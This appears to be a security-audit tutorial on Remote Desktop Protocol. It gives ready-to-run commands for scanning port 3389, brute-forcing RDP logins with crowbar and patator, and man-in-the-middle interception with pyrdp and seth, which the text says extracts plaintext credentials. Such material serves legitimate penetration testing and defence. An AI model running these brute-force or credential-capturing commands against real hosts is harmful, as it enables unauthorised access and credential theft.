RDP Security Audit

Table of contents

1. How to discover computers with Remote Desktop Protocol (RDP)

1.1 Search of RDP open ports

1.2 Connection with standard utilities

2. Brute Force RDP

2.1 crowbar (levye)

2.2 patator

2.3 rdesktop-brute

3. Collection of information about RDP and through RDP

3.1 rdp-sec-check to get RDP service security settings

3.2 Nmap scripts for gathering information and auditing RDP

4. Man-in-the-middle attack on RDP

4.1 Responder

4.2 pyrdp

4.3 seth

5. Other programs

5.1 sensepost-xrdp

5.2 sticky-keys-hunter


This section describes the tools and methods that are associated with the search and auditing of the security of remote desktops, which are provided by the RDP service.

How to discover computers with Remote Desktop Protocol (RDP)

Search of RDP open ports

By default, the RDP server listens on TCP port 3389 and UDP port 3389; therefore, computers with Remote Desktop enabled can be searched using Nmap with a command of the form:

sudo nmap -p 3389 -sU -sS NETWORK

For example:

sudo nmap -p 3389 -sU -sS --open 192.168.0.0/24

To collect banners, you can add the options -sV --script = banner (Nmap usage tips):

Connection with standard utilities

You can check the availability of the running RDP service with the usual utilities.

On Windows:

  • mstsc

On Linux:

  • freerdp
xfreerdp /f /u:USERNAME /PASSWORD /HOST[:PORT]
  • rdesktop
rdesktop -u USERNAME -p PASSWORD HOST

Brute Force RDP

crowbar (levye)

The crowbar program, formerly called levye, is a brute force tool that supports sshkey, vnckey, rdp, openvpn.

A feature of the program is its simplicity and effectiveness.

Install crowbar on Kali Linux

sudo apt install crowbar freerdp2-x11 openvpn nmap

Install crowbar on BlackArch

sudo pacman -S crowbar freerdp openvpn nmap

As a target, you can specify a range of IP addresses in CIDR format (option -s), or a file with such ranges (option -S). If you need to specify only one target (one IP address), then just use the /32 mask, for example, 192.168.0.101/32.

The -U option specifies a file with a list of user names, and the -u option allows you to specify a single user.

The -C option specifies a password list file, and the -c option specifies a single password.

With the -b option, you need to specify the protocol for the attack, in this case -b rdp.

With the -p option, you can change the standard protocol port.

The -d option makes it check that the ports are open for the specified targets (i.e., those specified with the -S and -s options). Verification is done by nmap.

All crowbar options:

positional arguments:
  options

optional arguments:
  -h, --help            show this help message and exit
  -b {openvpn,rdp,sshkey,vnckey}, --brute {openvpn,rdp,sshkey,vnckey}
                        Target service
  -s SERVER, --server SERVER
                        Static target
  -S SERVER_FILE, --serverfile SERVER_FILE
                        Multiple targets stored in a file
  -u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...]
                        Static name to login with
  -U USERNAME_FILE, --usernamefile USERNAME_FILE
                        Multiple names to login with, stored in a file
  -n THREAD, --number THREAD
                        Number of threads to be active at once
  -l FILE, --log FILE   Log file (only write attempts)
  -o FILE, --output FILE
                        Output file (write everything else)
  -c PASSWD, --passwd PASSWD
                        Static password to login with
  -C FILE, --passwdfile FILE
                        Multiple passwords to login with, stored in a file
  -t TIMEOUT, --timeout TIMEOUT
                        [SSH] How long to wait for each thread (seconds)
  -p PORT, --port PORT  Alter the port if the service is not using the default value
  -k KEY_FILE, --keyfile KEY_FILE
                        [SSH/VNC] (Private) Key file or folder containing multiple files
  -m CONFIG, --config CONFIG
                        [OpenVPN] Configuration file
  -d, --discover        Port scan before attacking open ports
  -v, --verbose         Enable verbose output (-vv for more)
  -D, --debug           Enable debug mode
  -q, --quiet           Only display successful logins

Example of a successful attack on RDP:

sudo crowbar -b rdp -U user.txt -C passwords.txt -s 192.168.0.101/32

The levye program also works, but it has slightly different options, an example run:

levye -b rdp -u logins.txt -c passwords.txt -s 192.168.0.101/32

patator

patator is a powerful brute-force program for many network services.

RDP brute force startup example:

patator rdp_login host=192.168.0.101 user=FILE0 password=FILE1 0=user.txt 1=passwords.txt

For more information about using patator, see the program help https://en.kali.tools/?p=147, as well as the links to instructions at the bottom of the article.

rdesktop-brute

This is a modified version of the already reviewed rdesktop program, which is a client for connecting to Windows Remote Desktop. This version differs from the original in that a patch for brute force is added.

Let me remind you that the rdesktop program requires additional configuration if Network Level Authentication (NLA) is enabled, so using it is not very convenient.

Collection of information about RDP and through RDP

rdp-sec-check to get RDP service security settings

The rdp-sec-check tool checks which encryption algorithms and authentication methods are used, as well as some other security settings. At the end of the check, rdp-sec-check summarizes the potential security issues of the Remote Desktop Service.

Install rdp-sec-check on Kali Linux

sudo cpan
install Encoding::BER
Ctrl+d
wget https://raw.githubusercontent.com/portcullislabs/rdp-sec-check/master/rdp-sec-check.pl
chmod +x rdp-sec-check.pl
./rdp-sec-check.pl --help

Install rdp-sec-check in BlackArch

sudo pacman -S rdp-sec-check

The command to run is very simple:

rdp-sec-check HOST

For example:

rdp-sec-check 192.168.0.101

In the screenshot you can see the security methods used on the remote RDP server. You can see that after the line [+] Summary of security issues there is nothing, then there are no obvious problems.

Let's check another, less secure host:

rdp-sec-check 192.168.0.89

Here we see the following RDP server security issues:

[+] Summary of security issues

[-] 192.168.0.89:3389 has issue NLA_NOT_SUPPORTED_DOS
[-] 192.168.0.89:3389 has issue SSL_SUPPORTED_BUT_NOT_MANDATED_MITM

They say that NLA is not used and therefore a DOS attack is possible. I’ll add from myself that if the NLA is not used, then a man-in-the-middle attack is also possible. It is further stated that SSL is supported, but not required, which makes the MITM (man-in-the-middle) attack possible.

Nmap scripts for gathering information and auditing RDP

Full list of scripts: https://nmap.org/nsedoc/

Among them, I found 3 related to RDP:

rdp-enum-encryption

Determines which Security layer and Encryption level is supported by the RDP service. It does so by cycling through all existing protocols and ciphers. When run in debug mode, the script also returns the protocols and ciphers that fail and any errors that were reported.

rdp-ntlm-info

This script enumerates information from remote RDP services with CredSSP (NLA) authentication enabled.

rdp-vuln-ms12-020

Checks if a machine is vulnerable to MS12-020 RDP vulnerability.

To start, you need to use the --script option, after which you can specify a script, or several scripts separated by commas:

sudo nmap -p 3389 -sU -sS --script rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 192.168.0.101

You can also use all the scripts as follows:

sudo nmap -p 3389 -sU -sS --script 'rdp-*' 192.168.0.101

An example of finding RDP servers on a local network and retrieving information using NSE scripts:

sudo nmap -p 3389 -sU -sS --script 'rdp-*' 192.168.0.0/24

Man-in-the-middle attack on RDP

Responder

Responder is a comprehensive tool for performing a man-in-the-middle attack against Windows authentication methods. Among other rogue servers, the program has an RDP server.

See the Responder attack example in the article “Windows Network Authentication Hacking”.

pyrdp

pyrdp is a man-in-the-middle attack tool and a library for working with RDP written in Python 3.

Includes three tools:

  • pyrdp-clonecert
  • pyrdp-mitm
  • pyrdp-player

Pyrdp does not have its own spoofer, so traffic redirection must be done with third-party tools such as bettercap, Ettercap or MITMf.

Pyrdp created his own version of bettercap, the main difference from the original one, which redirects all traffic during an attack, is that this version redirects only RDP traffic. Details about this are here: https://github.com/GoSecure/pyrdp/blob/master/docs/bettercap-rdp-mitm.md

Example of launching a man-in-the-middle attack on RDP using pyrdp:

pyrdp-mitm 192.168.0.101

Error “ImportError: cannot import name 'RsaKey' from 'Crypto.PublicKey.RSA'”

The following error may occur:

Traceback (most recent call last):
  File "/usr/bin/pyrdp-mitm", line 16, in <module>
    from pyrdp.core import settings
  File "/usr/lib/python3.8/site-packages/pyrdp/core/__init__.py", line 9, in <module>
    from pyrdp.core.FileProxy import FileProxy, FileProxyObserver
  File "/usr/lib/python3.8/site-packages/pyrdp/core/FileProxy.py", line 10, in <module>
    from pyrdp.core.observer import Observer
  File "/usr/lib/python3.8/site-packages/pyrdp/core/observer.py", line 7, in <module>
    from pyrdp.pdu import PDU
  File "/usr/lib/python3.8/site-packages/pyrdp/pdu/__init__.py", line 28, in <module>
    from pyrdp.pdu.rdp.connection import ClientChannelDefinition, ClientClusterData, ClientCoreData, ClientDataPDU, \
  File "/usr/lib/python3.8/site-packages/pyrdp/pdu/rdp/connection.py", line 10, in <module>
    from Crypto.PublicKey.RSA import RsaKey
ImportError: cannot import name 'RsaKey' from 'Crypto.PublicKey.RSA' (/usr/lib/python3.8/site-packages/Crypto/PublicKey/RSA.py)

To fix it, run the commands:

sudo pip3 uninstall PyCrypto
sudo pip3 uninstall PyCryptodome
sudo pip3 install PyCryptodome

Error “The server failed the negotiation. Error: The server requires that the client support Enhanced RDP Security”

This error is also possible:

[2020-04-17 15:37:52,717] - INFO - Joyce154823 - pyrdp.mitm.connections.tcp - New client connected from 192.168.0.53
[2020-04-17 15:37:52,717] - INFO - Joyce154823 - pyrdp.mitm.connections.x224 - Cookie: mstshash=Tester
[2020-04-17 15:37:52,718] - INFO - Joyce154823 - pyrdp.mitm.connections.tcp - Server connected
[2020-04-17 15:37:52,723] - INFO - Joyce154823 - pyrdp.mitm.connections.x224 - The server failed the negotiation. Error: The server requires that the client support Enhanced RDP Security (section 5.4) with CredSSP (section 5.4.5.2).
[2020-04-17 15:37:52,725] - INFO - Joyce154823 - pyrdp.mitm.connections.tcp - Server connection closed. Connection to the other side was lost in a non-clean fashion: Connection lost.

Its reason is that at the moment the program does not support Network Level Authentication (NLA). A little more about this is said here: https://github.com/GoSecure/pyrdp/issues/168

Network Level Authentication (NLA) is a good way to provide additional RDP protection, since without the attacker's knowledge of the Windows user password, it becomes impossible to execute a man-in-the-middle attack on RDP.

seth

seth performs a MitM attack and extracts the credentials in plain text from RDP connections.

Usage:

/usr/share/seth/seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP | HOST_IP>

Launch Example:

sudo seth wlo1 192.168.0.89 192.168.0.101 192.168.0.1

Other programs

sensepost-xrdp

sensepost-xrdp is the simplest X11 remote desktop tool for operating X11 sessions that do not require authentication.

sticky-keys-hunter

sticky-keys-hunter is a script for testing RDP hosts on sticky keys and utilman backdoor.

Usage:

sticky-keys-hunter TARGET_IP

Recommended for you:

Leave a Reply

Your email address will not be published. Required fields are marked *